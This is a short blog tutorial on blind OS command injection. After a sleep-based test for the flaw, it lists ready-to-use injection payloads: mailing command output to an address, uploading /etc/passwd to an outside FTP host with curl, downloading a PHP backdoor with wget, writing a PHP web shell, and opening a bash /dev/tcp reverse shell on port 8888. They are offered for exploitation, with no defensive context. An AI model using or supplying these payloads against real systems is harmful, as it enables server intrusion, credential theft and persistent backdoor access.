downtechs
Loading...
tutorials




Blind OS Command Injection

Reply A+ A-
http://down--tech.blogspot.com/2015/03/blind-os-command-injection.html
Blind OS Command Injection

Blind OS Command Injection

OS Command Injection is a vulnerability where you can implant shell commands in a script which will be executed by the current user (in the best case: root). Not every page gives you an output (f.e. if the php function "exec()" is in use) but you can test a blind vulnerability with the sleep command:

sleep 10 = pageload 10 sec

now we can use different methods to exploit the vulnerability:
send output via mail
;ls|mail e-mail@provider.com

transfer the output to our ftp via curl
;curl -T /etc/passwd -u user:passwort ftp://seite.com

load a php backdoor
;wget -O backdoor.php http://seite.com/backdoor.txt

create a script to execute visible system commands
;echo "<? system(\$cmd); ?>">backdoor.php

access via reverse shell (netcat), port 8888
;/bin/bash -i > /dev/tcp/my ip/8888 0<&1 2>&1
tutorials 5225567320644036902

Post a Comment Default Comments Disqus Comments

emo-but-icon

Newer Post Older Post Home item
Home item

Find Us On Facebook

Follow Us On Twitter

Popular Posts

  • High Severity Vulnerability Found in PolarSSL Library
    High Severity Vulnerability Found in PolarSSL Library A vulnerability that can be exploited for denial-of-service (DoS) attacks ...
  • pwntools - CTF Toolkit
    pwntools - CTF Toolkit This is the CTF framework used by Gallopsled in every CTF. from pwn import * context(arch = 'i386...
  • Recommended Removals
    https://www.bark.com/en/company/bradford-removal-service/mdYK6/ http://blog.netanagent.com/gazumping-what-is-it-and-how-can-you-avoid-it/ ...

Random Posts